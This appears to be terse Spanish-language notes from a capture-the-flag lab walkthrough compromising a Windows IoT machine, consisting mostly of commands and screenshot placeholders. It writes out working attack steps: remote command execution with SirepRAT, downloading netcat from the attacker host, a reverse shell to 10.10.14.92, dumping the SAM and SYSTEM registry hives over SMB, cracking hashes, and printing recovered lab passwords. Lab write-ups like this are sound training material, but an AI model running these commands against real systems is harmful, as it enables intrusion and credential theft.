nmap -A -p- -oA omni 10.129.2.27 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA omni 10.129.2.27

nmap -sU -O -p- -oA omni-udp 10.129.2.27

nikto -h 10.129.2.27:80

Pasted image 20211102162706.png

Pasted image 20211102162952.png

git clone https://github.com/SafeBreach-Labs/SirepRAT.git

Pasted image 20211102163642.png

python3 SirepRat.py 10.129.2.27 LaunchCommandWithOutput --cmd "C:\Windows\System32\cmd.exe" --args "/c ping 10.10.14.92"

tcpdump -i tun0 icmp -n

Pasted image 20211102171101.png

Bajamos netcat para Windows

https://github.com/vinsworldcom/NetCat64/releases/

Pasted image 20211102173603.png

https://github.com/api0cradle/UltimateAppLockerByPassList

https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

Escogemos esta ruta

C:\Windows\System32\spool\drivers\color

No funcionó

Pasted image 20211102180315.png

python3 SirepRat.py 10.129.2.27 LaunchCommandWithOutput --cmd "powershell" --args "/c iwr -uri http://10.10.14.92/nc64.exe -OutFile C:\Windows\System32\spool\drivers\color\nc64.exe"

python3 -m http.server 80

Pasted image 20211102180604.png

python3 SirepRat.py 10.129.2.27 LaunchCommandWithOutput --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd 10.10.14.92 443"

nc -lvnp 443

Pasted image 20211102180837.png

echo %USERNAME%

Para buscar el archivo usamos esto en Windows

dir /r /s user.txt

Pasted image 20211102181412.png

powershell

(Import-CliXml -Path user.txt)

Pasted image 20211102181838.png

Para ver los permisos (ACL) del archivo

icacls user.txt

Pasted image 20211102182029.png

reg save HKLM\system system.backup

reg save HKLM\sam sam.backup

Pasted image 20211102182227.png

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd) -smb2support -username cu3rv0x -password password123

use x: \\10.10.14.92\smbFolder /user:cu3rv0x password123

Pasted image 20211102182748.png

copy sam.backup x:\sam

copy system.backup x:\system

Pasted image 20211102183000.png

python3 /opt/impacket/examples/secretesdump.py -sam sam -system system LOCAL

Pasted image 20211102183307.png

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

Pasted image 20211102184023.png

http://10.129.2.27:8080

credenciales: app:mesh5143

Pasted image 20211102184453.png

C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd 10.10.14.92 443

nc -lvnp 443

Pasted image 20211102184956.png

powershell

(Import-CliXml -Path user.txt).GetNetworkCredential().password

Pasted image 20211102185617.png

(Import-CliXml -Path iot-admin.xml).GetNetworkCredential().password

Pasted image 20211102190151.png

http://10.129.2.27:8080

credenciales: administrator:_1nt3rn37ofTh1nGz

Pasted image 20211102190529.png

C:\Windows\System32\spool\drivers\color\nc64.exe -e cmd 10.10.14.92 443

nc -lvnp 443

Pasted image 20211102190848.png

(Import-CliXml -Path root.txt).GetNetworkCredential().password

Pasted image 20211102191157.png

